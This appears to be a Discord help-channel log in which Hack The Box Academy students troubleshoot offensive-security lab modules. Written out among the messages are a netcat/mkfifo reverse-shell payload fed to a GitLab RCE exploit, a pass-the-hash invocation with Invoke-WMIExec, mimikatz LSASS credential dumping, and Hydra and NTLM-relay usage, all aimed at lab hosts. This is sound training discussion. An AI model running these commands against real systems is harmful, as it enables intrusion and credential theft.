└╼smp$xfreerdp /v:$TGT /u:image /p:'Academy_student_AD!' /dynamic-resolution
[18:39:43:052] [56729:56730] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[18:39:43:052] [56729:56730] [WARN][com.freerdp.crypto] - CN = ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
[18:39:50:167] [56729:56730] [WARN][com.freerdp.core.nla] - SPNEGO received NTSTATUS: STATUS_LOGON_FAILURE [0xC000006D] from server
[18:39:50:167] [56729:56730] [ERROR][com.freerdp.core] - nla_recv_pdu:freerdp_set_last_error_ex ERRCONNECT_LOGON_FAILURE [0x00020014]
[18:39:50:167] [56729:56730] [ERROR][com.freerdp.core.rdp] - rdp_recv_callback: CONNECTION_STATE_NLA - nla_recv_pdu() fail
[18:39:50:167] [56729:56730] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1
I've accepted the certificate on my first connection attempt already. I'm not sure if the domain name should match the one from the section. In the section it says ACADEMY-IAD-DC01 but i get ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL in the cert.
Check Resources
the logon failure isn't a problem with the certificate
LOGON_FAILURE is an issue with the username/pw
I use the passwordlist from the resources
But can I use Hydra or do I have to use o365spray?
Have you found the correct username? Started with M.....
hydra works
hydra worked for me
o365 is more specific to office 365
Yeah, just wonder why the computer name is different in the cert as in the section. Nonetheless, i only see one pair of credentials and it works only for one of the two target machines :/ Already terminated the session and recreated it.
okay I will try hydra again thanks 🙂
Need some help? Learn how to reach the support team on Academy.
-t 12 worked for me
Can I use the command from the lecture? 😮
Can i Dm you if you don't mind?
Sure @mighty shell
Hello! i do have a question part of the penetration tester path - Web Enumeration. Anyone working on?
Can I dm you to check my hydra command?
hi, can anybody help me with noctural box?
anyone free to help me on the advanced xss skills assessment part please? I can browse to my payload and trigger a chain that causes a user to be promoted. But when I put it into a payload on the exploit server and send to victim it always asks for a login, when I try xhr with credentials it gets blocked.
I tried adding a DNS Server 1.1.1.1 to the /etc/resolv.conf file, so the target the domain will be inlanefreight.com but won't save?
Yes
think I may have got it now 😄
#1360673885376483378 read and follow #welcome instructions to access it
why are you messing with the resolv.conf file?
yea already done
okay so the payload works when I view it, but when I send to victim it doesnt work ?
I know that this doesn't belong here but i don't kow where to ask. I want to do the starting point machines on the main htb site but i can't spawn any machine. Can anybody help?
you have to connect with openvpn first or start a machine
i did that
it says i can't access this channel
I found I was performing a bit of a schoolboy error and forgetting to remove newlines from the output prior to encrypting it...once I did that it worked for me
Read and follow #welcome to get access
completely forgot to do this when i've joined the channel thanks!
@fathom pendant
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
see article above
Can you hack using a phone?
even if you could, you're better off using a PC..
I am on the CPTS path and at the Attacking Common services. at the 3 last exercise labs Easy, Medium, Hard. Is it me or is the EASY lab quite hard. I am scared of starting the Medium and Hard ones hahaha
Can someone save me?
academy.hackthebox.com/module/147/section/1638
Question: Using Julio's hash, perform a Pass the Hash attack, launch a PowerShell console and import Invoke-TheHash to create a reverse shell to the machine you are connected via RDP (the target machine, DC01, can only connect to MS01). Use the tool nc.exe located in c:\tools to listen for the reverse shell. Once connected to the DC01, read the flag in C:\julio\flag.txt.
Steps Performed:
1)Using Julio’s hash, performed a Pass the Hash attack, launched a PowerShell
- Created payload(powershell64) via https://www.revshells.com/ IP: 172.16.1.5 Port: 8888
3)In powershell Import-Module .\Invoke-WMIExec.ps1
-
Invoke-WMIExec -Target 172.16.1.10 -DOMAIN inlanefreight.htb -Username julio -Hash <Julio hash> -Command "<Generated payload>"
-
listener that is running CMD not receiving the shell via nc listener on port 8888
What am I doing wrong?
Anyone done the advanced xss & csrf module wana give me a hand? I can make the payload work on myself and it attempts to promote the user correctly, but when I send it to the victim, my user isn't promoted? Ive used the open redirect etc..
do you recommend completing all tier 0 modules (given that they are effectively free)?
I don't see a reason not to! I pretty much love all of the academy stuff, and that's certainly a good place to start!
there's a wide breadth of knowledge that they cover, however some of the modules step over each other and cover essentially the same thing (same topic but more generic); it wouldn't hurt but it would take a while
oh wow, yeah I just checked, there's a lot more Tier 0 in there than I thought!
But I mean, before committing to a subscription, might as well.
Personally I feel like I should've started with paths much sooner though, as dumb as it sounds, but I figured that out only later - that all those basic things like "how do I actually connect to a machine through PwnBox" are explained somewhere, and you don't HAVE to fumble your way through everything ^^
As I remember, when first signing up on HTB, it was not as obvious where to start, I remember being a bit overwhelmed. My excitement kept me going, just could've saved a few "duh" moments
hi everybody, i just joined the discord community because i got some problems with "Linux Fundamentals". Can i ask here or is there a specific channel or # where i can ask for help. Thankssss
hey, can i dm someone about the last question in the Android Fundamentals module ? im asked to sign an .apk file on android studio but i get errors
module questions are best asked right here 🙂
Hi, in AV Evasion Dynamic Analysis section, I am trying to use the AES technique but I am getting this error
Hi, does anyone know why in the Attacking Common Services module, in the Attacking FTP section, when asked “What username is available for the FTP server?” the answer anonymous does not fit, although clearly anonymous login is possible. Can anyone tell me what I'm doing wrong?
okay now i did by myself but i will ask for sure for some help. Thank you
because there's an actual username available
does anyone know where i can ask for direction on a machine i'm doing?
it says no access for me
👁️
thank you 🙏
I'm in shells & payloads - the live engagement. I've been trying for days to get this to work. I create a payload and upload it to the server, but I keep getting an error page on the server: HTTP Status 500 – Internal Server Error. What am I doing wrong?
is this the correct format or am i tripping?
mmmm...not sure about that 3 after xfreerdp, and never seen quotes around the password
if always been using xfreerdp3
and quotes because otherwise it thinks the ! is a command
never mind
now it works, i guess i had to wait like 5 min until the target fully loaded
Hey
this also didn't work for me.. I used (like you already tried) cURL to get the flag
Hey pals ,
I am doing Information gathering web edition , And I have been stuck at this third question in the skill assessment
What is the API key in the hidden admin directory that you have discovered on the target system?
I later retried the question using ligolo-ng (which is not covered, but I highly recommend checking it out) and managed to load it up
Sweet thanks. Maybe a buggy lab? I know ligolo-ng well and love it! I’m doing this course as a review and to gain a new perspective.
I think that could be the case.. all the forum posts I found didn't result in anything.. And checked every step to make sure it should work..
Maybe there is still a 1% chance that I fucked something up and will never know..
So yeah, sorry can't help
I guess all that matters is the cURL worked. I’m pretty confused as to why proxychains or foxy proxy didn’t work.
hi on the socat redirection with bindshell section of pivoting tunneling and port forwarding module I am doing the exact instructions and the shell successfully establishes but then dies immediately preventing me from actually getting a bind shell. I tried using versions of the exploit for linux and windows and tried playing with it and I come closest when following the exact instructions as that's the only way it doesn't get blocked.
what am I doing wrong? by the way, I hope I'm not spoiling too much I'm trying to be vague here.
but I played with IP addresses and port numbers and it appears like I am supposed to just follow instructions and the way the instructions say makes the most sense when I research it
like I think I understand the instructions too
Does anyone have any idea how to terminate my vpn connection in htb I closed the terminal reset the page even restarted the vm but no luck says I have 2 connection
maybe you have a "dead" interface which didn't get terminated correctly. Check with ifconfig if you see something like tun1 or tun2 (tun0 should be default vpn)
Yeah i have tun0 but I can't seem to terminate it
I tried reseting the target host and it still won't work
I have a screenshot in case anyone wants to see it
sudo killall openvpn
Never close a terminal with a running process. Always terminate the process before closing
Anyone here solved assembly module ?
I did
Any tips on nocturnal
Ok i will send you private
Check the dm
#1360673885376483378 read and follow #welcome to access
Intro to Sliver module question 1 of Domain Recon section: + 1 Submit the relative identifier of the SID for user websec
i submit the user SID and Incorrect answer
because it's asking for the RID; not the full SID
the RID is the last set of digits
anyone care to help on the very last part of the advanced XSS skill assessment? can't seem to wrap my head around this sql part
wow i can't read
thanks
hi anyone able to help me out with the current bindshell section I'm on?
Hello apologies if this has been asked before but I am currently in the HTTP Headers section on the Web Requests module, and do not see the flag file that is to be loaded. I only see JavaScript and fonts.gstatic files. Do I need to check the js files for the flag?
If you're still stuck you can DM.
can I DM you now?
like are you available to help? I have a screenshot of everything
@gray yacht or are you available later tonight or tomorrow any time?
Yes, I can assist if you still need it
Going way back in the chats, but it looks like you put in an erratum for the file transfers module, living off the land lesson because of the certreq.exe -Post command. On the enterprise version at least it has not been corrected. It seems like the changes don't always carry across to the enterprise version.
In Network tab you can see that the flag is loaded in File section where others files like favicon and .js are loaded. Sure you unable to see it?
r1cky said he’d help me later tonight
I’m taking a break until then
You need to check for VHOSTs and enumerate it further.
i believe module updates are synced between Academy and Enterprise. so it may not have been changed at all
not staff though, so i can't confirm
oof. well i'll begin the fun journey of trying to figure out how to finish this module. I only see one person who's made the same comment as mine and it was two years ago.
Thanks tho
Hey marcie havin some trouble with this, think maybe you could help me out
Any errors?
no we good
I blocked the content and tried to keep only the relevant bits. If that's still not allowed, plz delete the picture
Just use words.. no need to post the pic. It's still revealing content from the module.
how does this command do NTLM relay attack if the hash isn't in the command impacket-ntlmrelayx --no-http-server -smb2support -t 10.10.110.146
it acts as a server and receives the hash then relays those creds to different protocols
i'd have to wait for the user to authenticate again though, no?
It'd be pretty rare to even use nc to transfer files IMO since there's better ways, if you absolutely have to then yes you can have the target connect back to the attacking machine using nc.exe to send a base64 of a file to your listener
I purchased nitro as I just started using Discord and can't figure out how to get emoticon by the side of my name
It depends on the roles you have in a server
Don’t need nitro for it
I usually don't use servers like these ever since the fed.
I checked that
And found 1 vhost , further scan revealed additional vhost
Added in the hosts file ,
Got the email and api key
But that answer is wrong
Maybe I can assist you
@storm elk Why did you do that
Moderator Badges are not the same
🛡 and and the administrator badge is different colors
assist with what? you're not even verified how can you assist with modules?
We don't do that here.
How do I change my name back
Done
I changed it i apologize
Also I sent over leads to close out that module
To close out that module?
What are you talking about?
Not for you HTB Work here
Just guidance for others to complete HTB Modules which I have done years ago!
It won't allow me to chat in #general
That's because you still haven't followed the instructions in #welcome.
Re read what if my HTB account is about 2 decades old
Considering HTB was created in 2017, that's not true. I'm tired of this, verify your account by following the instructions and move the chat to #general. This channel is for module discussion only.
Yes almost 9 years ago
Hi, can you please tell me how to find the actual username? I can't figure out how to find
There is actually two questions regarding that api key
Q3. What is the API key in the hidden admin directory that you have discovered on the target system ?
And
Q5. What is the API key the inlanefreight.htb developers will be changing too
I got the right answer for Q5 but i am stuck at Q3
Edit : nevermind I solved that
Your account just passed 2 months old on Discord. And I don't appreciate suspicious accounts friend requesting me out of the blue. Especially when your name in my request is LulzSec and here it is Jack McVerify? And considering that you're having trouble figuring out how to use Discord properly. 🤣 Not a good sign!
I don't utilize Discord. As their encryption is bypassable I've done it before as a finely penetrative test to test their encryptions.
I utilize tools such as "JanaPC" a real hacker hides their identity not reveal their identity.
My name was switched due to "Server" Rules.
I'm an OG to this Hacking game 🎮
This guy 😂
Module: Attacking Common Applications
Section: Attacking GitLab
Challenge: Gain remote code execution on the GitLab instance? Submit the flag in the directory you land in.
My Question: When I run below command with different users (authenticated e.g. my own created user or new discovered) I am getting an error message, that the djvumake is not installed, which is one of the dependencies djvulibre-bin packages. Is the goal to use a different payload than the one presented in the module?
-> python3 49951.py -t http://gitlab.inlanefreight.local:8081/ -u sxxx -p 'Passxxx' -c 'rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc 10.10.xx.xx 8443 >/tmp/f'
[1] Authenticating
/home/xxx/49951.py:35: DeprecationWarning: Call to deprecated method findAll. (Replaced by find_all) -- Deprecated since version 4.0.0.
token = soup.findAll('meta')[16].get("content")
Successfully Authenticated
[2] Creating Payload
djvumake not installed. Install by running command : sudo apt install djvulibre-bin`
Thanks HackTheBox.
I.. don't think that's us?
it is
Where?
Honestly.. purple
How did marketing not throw a fit
🤣
All good, just didn't recognise it
Dashboard in Academy.
Fair enough
hey guys noob question here
how can I take detailed notes while going through the cpts modules
There is no golden way to do it. But a lot of people here use Obsidian and save notes per module
Start organizing your notes with clear headings like module name, date, and key concepts. Bullet points for definitions, code descriptions, and common use cases. Highlight exceptions or important details, and try to summarize each section in your own words to reinforce understanding. Diagrams or flowcharts for complex concepts can help. Also make sure to review your notes regularly to keep the information fresh in your human CPU. 
For the software, I use Obsidian myself, but there's a lot of options to choose from.
thank you guys 
Hi, In the module Pivoting, Tunneling, and Port Forwarding , in the section of RDP and SOCKS Tunneling with SocksOverRDP. I'm struggling hard to get the flag, I have everything set up but when attempting the RDP it fails probably due to the Firewall. There is a hint (Jason is a local account and a Defender may try to stand in your way.), but I can't think of a way to bypass the Defender.
Anyone can help?
Where do i report a typo in one of the modules?
You can disable defender
But how can I disable the defender for the target machine if i don't have access? Or I only have to disable the defender of the pivot machine?
Can not solve this one even though i followed everything " Create an AVD for 'Pixel 3a API 34 Google APIs' using Android Studio. What is the build number of the device? (Format: build_number, Example: build_number-test)"
If I recall correctly you only need to disable it on the pivot machine
I have a hard time with Credential Hunting in Windows questions.
I downloaded the Lazagne repo and im trying to make it work on the target Windows system but nothing seems to be working.
I already tried making the executable file on BOTH Linux and Windows but it only gets created on Linux (because python is installed there).
I searched a little and to make an executable file on Windows target I need to run the following command pyinstaller --onefile -w lazagne.spec but the problem is Python is NOT installed on the target system
what can I do to make it work?
You can look for pre-compiled binaries although I'm pretty sure there's one in /opt/tools or C:\tools iirc
where can I look for pre-compiled binaries haha
there's literally an exe available
they are usually in the releases
0xW1LD provided a link for ya
ye, got it, thx again! ❤️
Hi all,
stuck on Windows Privilege Escalation SeDebugPrivilege, get an error when using mimikatz method and no output at all when using psgetsys.ps1.
Mimikatz output is as follows
'mimikatz # privilege::debug
Privilege '20' OK
mimikatz # log
Using 'mimikatz.log' for logfile : OK
mimikatz # sekurlsa::minidump lsass.dmp
Switch to MINIDUMP : 'lsass.dmp'
mimikatz # sekurlsa::logonPasswords
Opening : 'lsass.dmp' file for minidump...
ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000002)'
Psgetsys output is as follows
'PS C:\Users\Jordan\Desktop> .\psgetsys.ps1 [MyProcess]::CreateProcessFromParent(4140,"cmd.exe","")
PS C:\Users\Jordan\Desktop> .\psgetsys.ps1 [MyProcess]::CreateProcessFromParent(4140,"c:\Windows\System32\cmd.exe","")
PS C:\Users\Jordan\Desktop>'
Can someone help with this please?
I've searched the issue in discord but can't find any helpful material
Can not solve this one even though i followed everything " Create an AVD for 'Pixel 3a API 34 Google APIs' using Android Studio. What is the build number of the device? (Format: build_number, Example: build_number-test)"
Did you use procdump to create the dump file from an elevated session?
Thank you so much for your response, now i have a better understanding 👍😄
Hi, sorry I couldn't answer earlier but that's not true. In the module Attacking Enterprise Network the lesson shows the hosts file and they don't have the http:// prefix. Plus, eyewitness actually offers to prepend http or https with flags. To finish, I've run successfully eyewitness before and I've managed to do it before with and without the prefix.
I can't put my finger on why exactly eyewitness works sometimes and doesn't work most of the time, I'm suspecting it's due to selenium or browsers errors.... Adding the http:// prefix doesn't solve my issue here.
I did but that didn't work for whatever reason, I followed both methods exactly to no avail. However just noticed the note advising there is a new psgetsys script and that has worked for me. Thank you anyway!
If that lsass.dmp is not located in the same directory you are executing mimikatz from you either need to move it into that directory or provide the path to that lsass.dmp file, i.e., mimikatz # sekurlsa::minidump C:\path\to\the\lsass.dmp as the next mimikatz command is opening that file for the minidump.
If you're not understanding, you can DM.
Anyone wana help me on the advanced xss and csrf part? Im struggling on the last sql injection part
So I've found the additional endpoint and I can get data back with 1'1=1 etc..., it shows two columns, but when I inject into either of them I get {"error":"Something went wrong"}, anyone done the advanced xss and csrf skills assessment can help ?
Hi, I've started the Pentest in a Nutshell module, and in the topic 'Linux System Enumeration'.
When I try to install linpeas from github, the connection on the virtual machine always times out. Any way out for this thing?
the answer is the first part of the spoil
Ah i see fair enough, that must have been the issue then. Thanks for clarifying!
Can anyone help me? I know what the benefit of open ports is.
guys any help in this ??
don't spoil info for modules above tier 0
Hey guys, I'm working on the first assessment in AD attacks & Enumeration module and I got stuck, can anyone help?
I don't want to spoil the answers but I'd be glad to discuss it in DMs.
Hi
Module: Windows Privilege Escalation
Section: Pillaging
I am reading the text on mRemoteNG. It says that we can crack either Protected attribute or Password attribute. But I don't understand how we can do that when we don't know the master password?
After seeing the above message I thought I'd make mine similarly better 😅
Module: AD Enumeration & Attacks
Section: Skill Assessment 1
Answered the first 3 questions and now onto the 4th.
(Submit the content of the flag.txt file on the Administrator desktop on MS01).
I'm stuck at this level, appreciate any kind of help
You can DM
Can anyone help me? I am looking for anyone who has worked in the digital forensics field for a mentorship project I am working on. I’m just looking to ask a couple basic questions about the work you do and what your path to getting there might have looked like. If anyone knows someone that can help please send them my way. Thanks
This isn't #general; read and follow #welcome to access, there's also #forensics-cryptography or even #1024429874246590575
If it's a career related question: #careers-and-certs
Just a follow-up to some questions that I've asked earlier, I've had trouble with running eyewitness at all because of invalid headers issue, I've had trouble with aquatone because it wouldn't manage to take screenshots (error 21 or something) and I've now found gowitness which I've found works very well (on my arch linux set up at least) so if anybody has trouble with screenshot tools, I recommend trying gowitness
has anyone done the advanced xss & csrf can dm me please?
Hello all, I have a technical issue I was hoping to get some help with. I am in the Getting Started module for the Pentesting pathway in Academy.
I have had consistent issues when on a target system to getting network traffic from my attacker. E.g., revshells never connect, I dont see any traffic in my http server logs when performing a request, etc. Scanning the target system or interacting to it from attacker are not an issue.
I have also used ports that are known to be open on the target.
I am using my tun0 address and have disabled my firewall. My VM is using a NAT connection. I have also toggled between the UDP and TCP ovpn packages and switched VPN servers with no change in behavior.
Does anyone have some ideas of the issue here?
It helps when you say which section you're working on
If it's a public_ip:port; revshells won't be available
my bad, this is on 'Nibbles - Initial Foothold' but I experienced the same issue earlier in the module
Also it wouldn't be http connections for revshells, at least not typically
to clarify, the http traffic expected is from http requests from the target (getting a revshell payload over for example)
As far as issues, making sure you have the right ip for the revshell, and the right port
Thats not always the case, actually
You can trigger the payload over http: but it doesn't use http to call back
in these cases I mean that I request a transfer to transfer to target from attacker to then execute on target via wget or similar
Also: don't use your own vm and the pwnbox at the same time
This is a common enough issue
I dont use the pwnbox. So it seems any traffic (revshell or http requests) do not make it back to attacker for some reason
¯_(ツ)_/¯
I've never had issues so I couldn't tell you where to pinpoint the issue at
Most pentest distros don't have a firewall on by default
right, it's a confusing issue. Havent had it with HTB boxes or with other lab environments such as Offsec
back to google...
thank you for your time though
Try changing vpn regions to regenerate your vpn file
And making sure you don't somehow have multiple connections going
sudo killall openvpn
Just boosting it again 🤐
I'll give it a shot, thanks again
Read the section again, it tells you a master pw
Can I DM you?
It also tells you the location of the configuration file
Not taking dms for these modules
I will try to put forward without spoiling the content as much as I can.
So, in case of DPAPI encryption, it's straightforward. But when the config file is protected by user chosen password, it is shown to apply for loop. But how does one verify when it doesn't know both the config master password and decrypted remote service password?
mRemoteNG has a hardcoded master password unless changed by the user
It's mentioned as Marcie says
Is there any way to send a file from my machine to the PwnBox ?
Copy-Paste doesn't for a reason.
@fleet jay No. This discord is about HackTheBox and the various platforms.
Ok thanks
anyone want to help me on the advanced xss skills assessment please? almost done it but can't get payload to exfiltrate data at end keep getting error
The section mentions both
Password attacks section 2
Idk if it's a typo or they're 2 separate things
Secur32.dll, not Secure32.dll.
It’s commonly associated with the SSPI used for auth protocols and services.
Likely a typo.
got it
hello, I'm doing some modules and got some problem. The problem is that there is a zip archive I need to download and open. But I'm using HTB virtual Parrot. How can I drop this zip on vm? or maybe there is another way to get the archive
Any help
You can DM if you'd like, I have a little time.
Sure, thanks.
@strange pivot Please don't post content from modules above tier 0
right-click -> copy download link -> wget <paste link>
I have a dumb question lol
Trying to do this module Analyzing Evil With Sysmon & Event Logs, but how do i get to a windows machine, should i be using the open vpn connection with a copy of vmware ?
tytyty!
Dear team, the module Introduction to Windows Evasion Techniques contains some issues and it is difficult to complete each lab due to some errors, kindly check it.
It’s just a particular type of check that allows you to have a reverse shell. It’s a bit painful, but should be working
I tried every thing in the module and it did not work
Which section?
both Process Injection & Dynamic Analysis
Iirc the dynamic analysis section will depend on which approach you take for your code as all the section run a check with a specific signature
I can check my notes if I have the code I used (which should not be too far from what’s in the module)
please take discussion to DMs to avoid spoilers
So if im trying to connect to a windows machine for a lab ; how am i supposed to be connecting to that, the RDP doesn't work , and if i go into pwnbox which is a linux system , and rdp the internet doesn't work there, and i have to install sysmon
i dont know much about this but you should use xfreerdp to access it
or you can just ssh to the box
Still need help?
it depends on the situation
the labs will tell you how they expect you to connect, most of the time
well im trying to do this Windows Event Logs & Finding Evil
which gives me a target, but i can't rdp from my personal computer to that rdp
You'd need to get VPN access
Or use the Pwnbox
yeah i have the vpn installed, the pwnbox is linux though
and i can rdp to a windows device from the pwnbox
but theres no internet to install the sysmon
it should already be installed
C:\tools is typically where most tools are for academy targets
and typically this location is told to you in the reading
Hey, struggling with the last question here https://academy.hackthebox.com/module/267/section/3048 (Introduction to SCCM). I got creds for 3 accounts. None of them has administrative privileges. Can I DM someone on this?
Why you always typing here when you can DM me and you know this 
why windows rdp for windows log disconnect constantly
i checked my connection its pretty stable
tried changing vpn servers and in middle of my Skills Assessment it disconnected
3 times
/auto-reconnect
Hello, is there any Spanish speaker who can help me with some problems I'm having connecting to the VPN?
Learn about the Hack The Box VPN, when and why it's needed, and how to use it.
I have read that page many times, and it does not solve my mistakes.
reach out to support on the website
Need to speak to a person? Learn how to reach our support via HTB Labs.
that's illegal
which legal system are we abiding by again?
just curious 
I'm in the Linux Fundamentals: Filter Content module and cannot get the curl command to connect to the required website. The connection always times out.
For reference, the exact question is, "Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths (https://www.inlanefreight.com/directory" or "/another/directory") of that domain. Submit the number of these paths as the answer. "
Also ensure you're not using the vpn and pwnbox at the same time
Yes, it returned this:
You able to connect to the Internet on that machine?
And I'm only using the pwnbox as far as I can tell. Never figured out the VPN connection.
Good question. How could I check?
Ping 8.8.8.8
Pwnbox's Internet connectivity is limited, you can unlock more by spending money on the site. I believe regardless, the limitation isn't in place for inlanefreight.com because HTB owns that domain, but I could be misremembering the exact facts
On the HTB Labs:
Free Users have a single two hour session of Pwnbox available for the life of their account, as a way to test out its features. Free users also have limited internet access, with only our own target systems and GitHub being allowed.
VIP users have a limit of 24 hours per month to use their Pwnbox. This limit gets renewed with each month that you renew your VIP Subscription
VIP+ users have unlimited use of Pwnbox.
i guess that only speaks about the time limit not internet access
oh no it's right there: Free users also have limited internet access, with only our own target systems and GitHub being allowed.
so pwnbox should be able to reach the site
probably have to reach out to support to find out why it's not connecting, if you spin up your own VM you can do it from there too.
According to ping, yes.
I've never used a VM before, can you point me towards some instructions?
Should find a lot of results by just googling install parrotos/kali virtual machine
it boils down to installing a hypervisor to your computer then installing an OS inside the hypervisor
I got the socat redirection with bind shell section's steps completed
the way the section says to do it is messed up
but I figured it out with some help from @gray yacht
I mean it was a couple minor things I needed to do
the way the section says to do it doesn't work is the main issue
there's some stuff that needs to be modified
that is all I'll say
that's how it is with all HTB module tho 😭
you know this, you've been doing academy for long enough
openssl aes-256 -d -in <ciphertext file> -out <decrypted> -k <password> ?
The one for encrypting on windows is mentioned in the module i forgor it
That's not a command
xfreerdp /v:<ip> /u:htb-student /p:Academy_WinFun!
you're starting the command by pasting in from another terminal or the module's page
it starts with your hack the box name StringrayX
that's not a command, so you need to drop that part and just use xfreerdp/xfreerdp3
also wrap the password in single quotes
oh
i did that too
Are you running a headless session? like, do you have a desktop with icons you can click on etc or is it just the terminal?
also what module and section is this
js terminal (im usin pwnbox instance if dats wht u mean)
windows fundamentals
introduction to windows section
you can't minimize the terminal and see wallpaper etc?
i have to go so i can't really help much, but it sounds like you don't have a graphical environment. might be easier to run a virtual machine on your host instead of pwnbox, unless it's supposed to be like that i'm not sure for that module.
if u mean this, yes?
if u mean my desktop wallpaper no
hm ok thx
any1 who can help me figure dis out?
also if you're ssh'd into a machine you won't be able to rdp from that terminal
secure shell?
i dont think ive done dat tho
[!bash!]$ xfreerdp /v:<targetIp> /u:htb-student /p:Password
when i reloaded the syntax in the theory changed to dis but it dint work either
have you tried this using the openvpn instead of pwn box?
yea i knew smn was gonna say that
look
the prob is i cant
okok
let me try 🙂
is the machine up?
?
i really dont think so buddy check this
uhuh...
PING 10.129.233.252 (10.129.233.252) 56(84) bytes of data.
--- 10.129.233.252 ping statistics ---
4 packets transmitted, 0 received, 100% packet loss, time 3035ms
what da haiill
:))
if you read the module it'll tell you how to answer the questions
done
but i have to find build no. of this target
by rdp to it
and thats exactly what im struggling to do
xfreerdp isnt workin
can you terminate the machine and try to start it again?
i tried [!bash!]$ b4 xfreerdp but dat dint work either
uh but dont free users only have one spawn a day?
not for the target machine thats for the pwn box
dint get it but sure il terminate
oh shit
u meant da target
i accidentally terminated the instance
bruh!!
yeah the target machine
it ok il try again tmrw but rn il js give u new target
yeah let me try the rdp thing till then
hang on
10.129.95.252
@limpid void
if rdp works from ur vm il js ask u to tell me da build no. and windows nt ver. on it
well my friend i am afraid i cant do that :0 its against policies i guess
oh
np
u helped as much as u can so tysm
also i luv ur pfp
happy to help ohh thank you so much xD
it's because the machine spawned in the isolated instance for them, so you can't access their lab
copy the command after the $. it looks like for whatever reason the thing didn't load, [!bash!]$ isn't anything (it's actually supposed to be the styler for the command block on the page)
like i said
i alr did that way too many times
doesnt work
$DISPLAY error
are you using the web terminal for pwnbox or the actual web desktop for pwnbox?
web terminal
Of course it's not gonna open anything... there's no display connected to that web terminal 💀
RDP = Remote DESKTOP Protocol, DESKTOP needs a display
you need to use the in-browser visual vm; not the terminal
dafuq r u yapping
im a nub so i have no idea
ALSO the in-browser terminal sucks 9/10 times
wht kind of display
this is outside the RDP user error
a display
real shit
the terminal isn't a display
oh wow
minimize the terminal; click the "fullscreen" button to open pwnbox in a new tab
uhuh
atp i'd be surprised as well if you have any time left
oh no i terminated it so dw il try it tmrw 🤣
after you open the pwnbox in a new tab => open a terminal in that session, then type/paste the xfreerdp command
ooohhhh
bet i got it
-# honestly just use vm + vpn, it's so much better 😭
ik
but i cant.
dont ask y
i js cant.
assuming it's not your computer/it's a school/work system
or it's just so bad specs (somehow) that you can't
something so old it doesn't support virtualization 
it would have to be 20+ years old atp
.
y r u so smart 😭
my computer is prolly lying in sm dusty old storeroom rn
yes this is an org pc
just finished the XSS module so not only do I get them I steal em cookies 
PHPSESSID=bG9sIG5pY2U= 
and honestly i dt it would be possible on my pc either cuz
due to reasons "admin" does not exist anymore on it
so basically
the only way to fix that is to boot into advanced recovery and change registry keys which is rather hard to do if u dont have pro help
or just factory reset it
again
you don't need admin to do that, actually
u dont
you can also create a bootable usb
powershell sucks, damn 
